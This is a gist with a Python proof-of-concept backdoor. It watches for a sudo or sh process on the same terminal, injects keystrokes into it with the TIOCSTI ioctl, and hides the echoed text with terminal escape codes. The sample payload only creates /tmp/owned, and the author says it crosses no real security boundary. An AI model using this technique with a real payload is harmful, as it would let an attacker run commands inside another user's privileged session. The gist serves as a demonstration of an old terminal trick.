@bahorn
Created May 3, 2024 21:23
A bad background task that will inject stuff into shells.
```python
#!/usr/bin/env python3
"""
So... I got nerd sniped by someone talking about a fake bug.
But in the process I got to learn a bit about an old trick and convert it into
a mildly interesting backdoor that lets you misuse a sudo session if started
from the basic user you owned.

Run like:
    python3 this.py &
Then run `sh` and the command will be injected into it.

I implemented some broken line removal, you can do a better job.

This is NOT a security issue, we ain't breaking any real security boundaries.
Do not claim it as one.

- bah
"""
import time
import os
import psutil
import fcntl
import termios

# Process names to look for. TIOCSTI only works on a tty that is this
# script's controlling terminal; for any other tty the kernel requires
# CAP_SYS_ADMIN, so the trick never crosses a user boundary.
WANT_TO_HIJACK = ['sudo', 'sh']
COMMAND = '\ntouch /tmp/owned\n'


def is_priv_process_running():
    """Return the tty of a sudo/sh process sharing our terminal, or None."""
    our_pty = [os.ttyname(0), os.ttyname(1), os.ttyname(2)]
    for process in psutil.process_iter():
        if process.name() not in WANT_TO_HIJACK:
            continue
        if process.terminal() not in our_pty:
            continue
        return process.terminal()
    return None


def send_command(fd, command):
    """Push each character into the tty's input queue via TIOCSTI."""
    for c in command:
        fcntl.ioctl(fd, termios.TIOCSTI, c)


def try_hijack(pty):
    fd = os.open(pty, os.O_RDWR)
    send_command(fd, COMMAND)
    # crude attempt to overwrite the echoed command on screen
    print('\033[2A\n' + ' ' * 32)


def main():
    # hiding the deletion, has some annoying side effects
    print('\033[2A\n' + ' ' * 32)
    send_command(0, '\n')
    while True:
        pty = is_priv_process_running()
        if pty:
            try_hijack(pty)
            time.sleep(10)
            break
        time.sleep(1)


if __name__ == "__main__":
    main()
```